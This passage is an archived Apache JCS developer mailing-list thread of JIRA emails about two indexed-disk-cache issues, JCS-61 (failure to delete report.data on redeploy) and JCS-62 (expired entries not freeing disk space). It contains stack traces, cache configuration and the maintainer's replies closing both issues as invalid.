30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org Failed to delete report.data file --------------------------------- Key: JCS-61 URL: https://issues.apache.org/jira/browse/JCS-61 Project: JCS Issue Type: Bug Components: Indexed Disk Cache Affects Versions: jcs-1.3 Environment: Windows XP,java5 Reporter: rushi Assignee: Aaron Smuts Fix For: jcs-1.3 Hi, I am using JCS in my Application. At the startup of the application, i am getting the following error. I found that same problem has been reported here but no one suggested solution for this. Please let me know the how to prevent this error. java.lang.IllegalStateException: Failed to delete report.data at org.apache.jcs.auxiliary.disk.indexed.IndexedDisk.reset(IndexedDisk.java:273) at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeEmptyStore(IndexedDiskCache.java:270) at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeKeysAndData(IndexedDiskCache.java:254) at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.<init>(IndexedDiskCache.java:177) at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheManager.getCache(IndexedDiskCacheManager.java:132) at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory.createCache(IndexedDiskCacheFactory.java:68) at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseAuxiliary(CompositeCacheConfigurator.java:583) at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:366) at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:287) at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegions(CompositeCacheConfigurator.java:265) at org.apache.jcs.engine.control.CompositeCacheConfigurator.doConfigure(CompositeCacheConfigurator.java:161) at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:329) at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:275) at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:264) at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:214) at org.apache.jcs.engine.control.CompositeCacheManager.getInstance(CompositeCacheManager.java:128) at org.apache.jcs.JCS.ensureCacheManager(JCS.java:96) at org.apache.jcs.JCS.getInstance(JCS.java:64) Thanks, Rushi -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Jul 13 15:21:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 38404 invoked from network); 13 Jul 2009 15:21:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 13 Jul 2009 15:21:28 -0000 Received: (qmail 91750 invoked by uid 500); 13 Jul 2009 15:21:37 -0000 Delivered-To: [email protected] Received: (qmail 91730 invoked by uid 500); 13 Jul 2009 15:21:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 91720 invoked by uid 99); 13 Jul 2009 15:21:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 13 Jul 2009 15:21:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 13 Jul 2009 15:21:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 4F173234C004 for <[email protected]>; Mon, 13 Jul 2009 08:21:15 -0700 (PDT) Message-ID: <1803423390.1247498475309.JavaMail.jira@brutus> Date: Mon, 13 Jul 2009 08:21:15 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-61) Failed to delete report.data file In-Reply-To: <294070204.1247482994912.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-61?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12730376#action_12730376 ] Aaron Smuts commented on JCS-61: -------------------------------- Does something else have a handle on the file? Are you sure that you aren't accidentally running two instance that are using the same directory? > Failed to delete report.data file > --------------------------------- > > Key: JCS-61 > URL: https://issues.apache.org/jira/browse/JCS-61 > Project: JCS > Issue Type: Bug > Components: Indexed Disk Cache > Affects Versions: jcs-1.3 > Environment: Windows XP,java5 > Reporter: rushi > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > Original Estimate: 5h > Remaining Estimate: 5h > > Hi, > I am using JCS in my Application. At the startup of the application, i am getting the following error. I found that same problem has been reported here but no one suggested solution for this. Please let me know the how to prevent this error. > java.lang.IllegalStateException: Failed to delete report.data > at org.apache.jcs.auxiliary.disk.indexed.IndexedDisk.reset(IndexedDisk.java:273) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeEmptyStore(IndexedDiskCache.java:270) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeKeysAndData(IndexedDiskCache.java:254) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.<init>(IndexedDiskCache.java:177) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheManager.getCache(IndexedDiskCacheManager.java:132) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory.createCache(IndexedDiskCacheFactory.java:68) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseAuxiliary(CompositeCacheConfigurator.java:583) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:366) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:287) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegions(CompositeCacheConfigurator.java:265) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.doConfigure(CompositeCacheConfigurator.java:161) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:329) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:275) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:264) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:214) > at org.apache.jcs.engine.control.CompositeCacheManager.getInstance(CompositeCacheManager.java:128) > at org.apache.jcs.JCS.ensureCacheManager(JCS.java:96) > at org.apache.jcs.JCS.getInstance(JCS.java:64) > Thanks, > Rushi -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 14 03:56:28 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 72349 invoked from network); 14 Jul 2009 03:56:28 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2009 03:56:28 -0000 Received: (qmail 40608 invoked by uid 500); 14 Jul 2009 03:56:38 -0000 Delivered-To: [email protected] Received: (qmail 40545 invoked by uid 500); 14 Jul 2009 03:56:37 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 40526 invoked by uid 99); 14 Jul 2009 03:56:37 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 03:56:37 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 03:56:35 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 0EDE629A0011 for <[email protected]>; Mon, 13 Jul 2009 20:56:15 -0700 (PDT) Message-ID: <369658605.1247543775048.JavaMail.jira@brutus> Date: Mon, 13 Jul 2009 20:56:15 -0700 (PDT) From: "rushi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-61) Failed to delete report.data file In-Reply-To: <294070204.1247482994912.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-61?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12730675#action_12730675 ] rushi commented on JCS-61: -------------------------- Hi Aaron, I am using RAD7.0 to deploy my application. One thing i identified while doing analysis. If i restart the server and deploy the application, i am not getting "Failed to delete report.data" error. The data file got deleted and recreated. If I redeploy the application without restarting WAS server, then i am getting this error. I don't think so that redeploying the application without restarting WAS server creates a new instance that uses the same directory. Thanks, Rushi > Failed to delete report.data file > --------------------------------- > > Key: JCS-61 > URL: https://issues.apache.org/jira/browse/JCS-61 > Project: JCS > Issue Type: Bug > Components: Indexed Disk Cache > Affects Versions: jcs-1.3 > Environment: Windows XP,java5 > Reporter: rushi > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > Original Estimate: 5h > Remaining Estimate: 5h > > Hi, > I am using JCS in my Application. At the startup of the application, i am getting the following error. I found that same problem has been reported here but no one suggested solution for this. Please let me know the how to prevent this error. > java.lang.IllegalStateException: Failed to delete report.data > at org.apache.jcs.auxiliary.disk.indexed.IndexedDisk.reset(IndexedDisk.java:273) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeEmptyStore(IndexedDiskCache.java:270) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeKeysAndData(IndexedDiskCache.java:254) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.<init>(IndexedDiskCache.java:177) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheManager.getCache(IndexedDiskCacheManager.java:132) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory.createCache(IndexedDiskCacheFactory.java:68) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseAuxiliary(CompositeCacheConfigurator.java:583) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:366) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:287) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegions(CompositeCacheConfigurator.java:265) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.doConfigure(CompositeCacheConfigurator.java:161) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:329) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:275) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:264) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:214) > at org.apache.jcs.engine.control.CompositeCacheManager.getInstance(CompositeCacheManager.java:128) > at org.apache.jcs.JCS.ensureCacheManager(JCS.java:96) > at org.apache.jcs.JCS.getInstance(JCS.java:64) > Thanks, > Rushi -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 14 09:45:31 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 91042 invoked from network); 14 Jul 2009 09:45:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2009 09:45:31 -0000 Received: (qmail 39730 invoked by uid 500); 14 Jul 2009 09:45:40 -0000 Delivered-To: [email protected] Received: (qmail 39691 invoked by uid 500); 14 Jul 2009 09:45:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 39681 invoked by uid 99); 14 Jul 2009 09:45:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 09:45:40 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 09:45:37 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 367DF234C045 for <[email protected]>; Tue, 14 Jul 2009 02:45:15 -0700 (PDT) Message-ID: <1916368111.1247564715218.JavaMail.jira@brutus> Date: Tue, 14 Jul 2009 02:45:15 -0700 (PDT) From: "rushi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Commented: (JCS-61) Failed to delete report.data file In-Reply-To: <294070204.1247482994912.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-61?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=12730754#action_12730754 ] rushi commented on JCS-61: -------------------------- Hi Aaron, If you think that redeploying the application without restarting WAS server creates a new instance that uses the same directory, then JCS will never work on my production machine. We have different clusters created on my production WAS server, and different application are running on each cluster. They never restart the WAS server to deploy the application. They simply uninstall the application and then reinstall the same. In the above case i can not run the application with JCS. Please suggest Thanks, Rushi > Failed to delete report.data file > --------------------------------- > > Key: JCS-61 > URL: https://issues.apache.org/jira/browse/JCS-61 > Project: JCS > Issue Type: Bug > Components: Indexed Disk Cache > Affects Versions: jcs-1.3 > Environment: Windows XP,java5 > Reporter: rushi > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > Original Estimate: 5h > Remaining Estimate: 5h > > Hi, > I am using JCS in my Application. At the startup of the application, i am getting the following error. I found that same problem has been reported here but no one suggested solution for this. Please let me know the how to prevent this error. > java.lang.IllegalStateException: Failed to delete report.data > at org.apache.jcs.auxiliary.disk.indexed.IndexedDisk.reset(IndexedDisk.java:273) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeEmptyStore(IndexedDiskCache.java:270) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeKeysAndData(IndexedDiskCache.java:254) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.<init>(IndexedDiskCache.java:177) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheManager.getCache(IndexedDiskCacheManager.java:132) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory.createCache(IndexedDiskCacheFactory.java:68) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseAuxiliary(CompositeCacheConfigurator.java:583) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:366) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:287) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegions(CompositeCacheConfigurator.java:265) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.doConfigure(CompositeCacheConfigurator.java:161) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:329) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:275) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:264) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:214) > at org.apache.jcs.engine.control.CompositeCacheManager.getInstance(CompositeCacheManager.java:128) > at org.apache.jcs.JCS.ensureCacheManager(JCS.java:96) > at org.apache.jcs.JCS.getInstance(JCS.java:64) > Thanks, > Rushi -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 14 10:23:29 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 14115 invoked from network); 14 Jul 2009 10:23:29 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2009 10:23:29 -0000 Received: (qmail 97045 invoked by uid 500); 14 Jul 2009 10:23:39 -0000 Delivered-To: [email protected] Received: (qmail 97004 invoked by uid 500); 14 Jul 2009 10:23:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 96994 invoked by uid 99); 14 Jul 2009 10:23:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 10:23:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 10:23:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D6D91234C051 for <[email protected]>; Tue, 14 Jul 2009 03:23:14 -0700 (PDT) Message-ID: <+1-743-284-3994.1247566994879.JavaMail.jira@brutus> Date: Tue, 14 Jul 2009 03:23:14 -0700 (PDT) From: "rushi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (JCS-62) not able to deallocate the disk memory MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org not able to deallocate the disk memory -------------------------------------- Key: JCS-62 URL: https://issues.apache.org/jira/browse/JCS-62 Project: JCS Issue Type: Bug Components: Indexed Disk Cache Affects Versions: jcs-1.3 Environment: Windows Xp,RAD,java5,AMD processor Reporter: rushi Assignee: Aaron Smuts Fix For: jcs-1.3 I have configured the JCS to store the cached objects in disk using below properties. jcs.region.report.cacheattributes=org.apache.jcs.engine.CompositeCacheAttributes jcs.region.report.cacheattributes.MaxObjects=2 jcs.region.report.cacheattributes.MemoryCacheName=org.apache.jcs.engine.memory.lru.LRUMemoryCache jcs.region.report.cacheattributes.UseMemoryShrinker=true jcs.region.report.elementattributes.MaxLifeSeconds=60 jcs.region.testCache1.cacheattributes.MaxMemoryIdleTimeSeconds=60 jcs.region.report.cacheattributes.ShrinkerIntervalSeconds=10 jcs.region.report.cacheattributes.MaxSpoolPerRun=300 jcs.region.report.elementattributes=org.apache.jcs.engine.ElementAttributes jcs.region.report.elementattributes.IsEternal=false jcs.auxiliary.DC=org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory jcs.auxiliary.DC.attributes=org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheAttributes jcs.auxiliary.DC.attributes.DiskPath=c:/tempcache jcs.auxiliary.DC.attributes.ClearDiskOnStartup=true jcs.auxiliary.DC.attributes.maxKeySize=100000 I tried to cache 100 objects. JCS cached the first 2 objects in the java memory as I specified jcs.region.report.cacheattributes.MaxObjects=2. The remaining objects gets cached in the disk file in c:/tempcache/report.data. After 60 (MaxLifeSeconds) seconds the objects stored in java memory got deleted. I am able to identify this by looking at the log file, it has log message like "Exceeded maxLifeSeconds: key name". I could not see above log message for the cached objects in disk after 60 seconds. I believe that objects stored on disk never get deleted but the surprise thing is if i try to access the cached object in disk after 60 seconds, it is returning null, that means the object has expired. But JCS is not deallocating the memory occupied by that expired object. Is it possible to deallocate that memory occupied when the object gets expired? I thought of asking this as I need to cache lot of data. If I am not able to deallocate the memory , the file size gets increased and might get exception. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 14 13:16:35 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 79247 invoked from network); 14 Jul 2009 13:16:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2009 13:16:35 -0000 Received: (qmail 78545 invoked by uid 500); 14 Jul 2009 13:04:40 -0000 Delivered-To: [email protected] Received: (qmail 78528 invoked by uid 500); 14 Jul 2009 13:04:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 78429 invoked by uid 99); 14 Jul 2009 13:04:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 13:04:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 13:04:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E741E234C04C for <[email protected]>; Tue, 14 Jul 2009 06:04:14 -0700 (PDT) Message-ID: <1637302871.1247576654946.JavaMail.jira@brutus> Date: Tue, 14 Jul 2009 06:04:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-61) Failed to delete report.data file In-Reply-To: <294070204.1247482994912.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-61?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-61. -------------------------- Resolution: Invalid Please don't open bugs for configuration problems. Just send a message to the list. > Failed to delete report.data file > --------------------------------- > > Key: JCS-61 > URL: https://issues.apache.org/jira/browse/JCS-61 > Project: JCS > Issue Type: Bug > Components: Indexed Disk Cache > Affects Versions: jcs-1.3 > Environment: Windows XP,java5 > Reporter: rushi > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > Original Estimate: 5h > Remaining Estimate: 5h > > Hi, > I am using JCS in my Application. At the startup of the application, i am getting the following error. I found that same problem has been reported here but no one suggested solution for this. Please let me know the how to prevent this error. > java.lang.IllegalStateException: Failed to delete report.data > at org.apache.jcs.auxiliary.disk.indexed.IndexedDisk.reset(IndexedDisk.java:273) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeEmptyStore(IndexedDiskCache.java:270) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.initializeKeysAndData(IndexedDiskCache.java:254) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCache.<init>(IndexedDiskCache.java:177) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheManager.getCache(IndexedDiskCacheManager.java:132) > at org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory.createCache(IndexedDiskCacheFactory.java:68) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseAuxiliary(CompositeCacheConfigurator.java:583) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:366) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegion(CompositeCacheConfigurator.java:287) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.parseRegions(CompositeCacheConfigurator.java:265) > at org.apache.jcs.engine.control.CompositeCacheConfigurator.doConfigure(CompositeCacheConfigurator.java:161) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:329) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:275) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:264) > at org.apache.jcs.engine.control.CompositeCacheManager.configure(CompositeCacheManager.java:214) > at org.apache.jcs.engine.control.CompositeCacheManager.getInstance(CompositeCacheManager.java:128) > at org.apache.jcs.JCS.ensureCacheManager(JCS.java:96) > at org.apache.jcs.JCS.getInstance(JCS.java:64) > Thanks, > Rushi -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Jul 14 13:24:06 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81273 invoked from network); 14 Jul 2009 13:24:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 14 Jul 2009 13:24:04 -0000 Received: (qmail 79073 invoked by uid 500); 14 Jul 2009 13:06:39 -0000 Delivered-To: [email protected] Received: (qmail 79058 invoked by uid 500); 14 Jul 2009 13:06:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <jcs-dev.jakarta.apache.org> Reply-To: "JCS Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 79048 invoked by uid 99); 14 Jul 2009 13:06:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 13:06:39 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 14 Jul 2009 13:06:36 +0000 Received: from brutus (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id D50FF234C04C for <[email protected]>; Tue, 14 Jul 2009 06:06:14 -0700 (PDT) Message-ID: <760605942.1247576774871.JavaMail.jira@brutus> Date: Tue, 14 Jul 2009 06:06:14 -0700 (PDT) From: "Aaron Smuts (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (JCS-62) not able to deallocate the disk memory In-Reply-To: <+1-743-284-3994.1247566994879.JavaMail.jira@brutus> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/JCS-62?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Aaron Smuts closed JCS-62. -------------------------- Resolution: Invalid JCS does not remove the item from the data file, only from the key list. The empty spots on the datafile are added to a recycle bin and reused. During an optimization run, remaining gaps will be removed. > not able to deallocate the disk memory > -------------------------------------- > > Key: JCS-62 > URL: https://issues.apache.org/jira/browse/JCS-62 > Project: JCS > Issue Type: Bug > Components: Indexed Disk Cache > Affects Versions: jcs-1.3 > Environment: Windows Xp,RAD,java5,AMD processor > Reporter: rushi > Assignee: Aaron Smuts > Fix For: jcs-1.3 > > > I have configured the JCS to store the cached objects in disk using below properties. > jcs.region.report.cacheattributes=org.apache.jcs.engine.CompositeCacheAttributes > jcs.region.report.cacheattributes.MaxObjects=2 > jcs.region.report.cacheattributes.MemoryCacheName=org.apache.jcs.engine.memory.lru.LRUMemoryCache > jcs.region.report.cacheattributes.UseMemoryShrinker=true > jcs.region.report.elementattributes.MaxLifeSeconds=60 > jcs.region.testCache1.cacheattributes.MaxMemoryIdleTimeSeconds=60 > jcs.region.report.cacheattributes.ShrinkerIntervalSeconds=10 > jcs.region.report.cacheattributes.MaxSpoolPerRun=300 > jcs.region.report.elementattributes=org.apache.jcs.engine.ElementAttributes > jcs.region.report.elementattributes.IsEternal=false > > jcs.auxiliary.DC=org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheFactory > jcs.auxiliary.DC.attributes=org.apache.jcs.auxiliary.disk.indexed.IndexedDiskCacheAttributes > jcs.auxiliary.DC.attributes.DiskPath=c:/tempcache > jcs.auxiliary.DC.attributes.ClearDiskOnStartup=true > jcs.auxiliary.DC.attributes.maxKeySize=100000 > I tried to cache 100 objects. JCS cached the first 2 objects in the java memory as I specified jcs.region.report.cacheattributes.MaxObjects=2. The remaining objects gets cached in the disk file in c:/tempcache/report.data. After 60 (MaxLifeSeconds) seconds the objects stored in java memory got deleted. I am able to identify this by 